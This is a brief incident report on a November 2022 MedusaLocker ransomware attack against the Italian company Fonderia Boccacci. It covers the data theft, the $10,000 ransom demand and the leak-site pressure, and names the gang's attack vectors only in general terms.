Cyber Incident Victim: Fonderia Boccacci

On or around November 15, 2022, Fonderia Boccacci, an Italian company, fell victim to a ransomware attack perpetrated by the MedusaLocker criminal gang. This marked the first confirmed attack by this group against an Italian organization. The attackers infiltrated the company’s IT infrastructure, exfiltrated data, and deployed ransomware to encrypt files. MedusaLocker subsequently published samples of the stolen data on their dark web leak site (DLS) to intensify pressure on the organization. The gang demanded a ransom payment of $10,000 in cryptocurrency in exchange for decryption keys and threatened full public release of the exfiltrated data if payment was not made. The exact volume of compromised files remained unclear based on available information. Fonderia Boccacci’s public-facing website highlighted commitments to environmental sustainability and operational safety, though no direct statements regarding the incident were observed at the time of reporting.

MedusaLocker employed multiple attack vectors to compromise targets, including exploitation of vulnerable Remote Desktop Protocol (RDP) configurations, phishing campaigns, and PowerShell scripts for network infiltration and data encryption. The gang’s leak site showcased screenshots of stolen data samples as proof of the breach, though specific file types or sensitive records were not detailed in public reports. No information regarding Fonderia Boccacci’s internal detection mechanisms, containment procedures, or decision-making about ransom negotiations was disclosed. The incident exposed operational disruptions and reputational risks associated with data exfiltration, though direct financial impacts beyond the ransom demand were unverified. Cybersecurity monitoring platforms continued tracking the case for further developments, but no subsequent updates regarding payment outcomes or additional data leaks were confirmed in the immediate aftermath.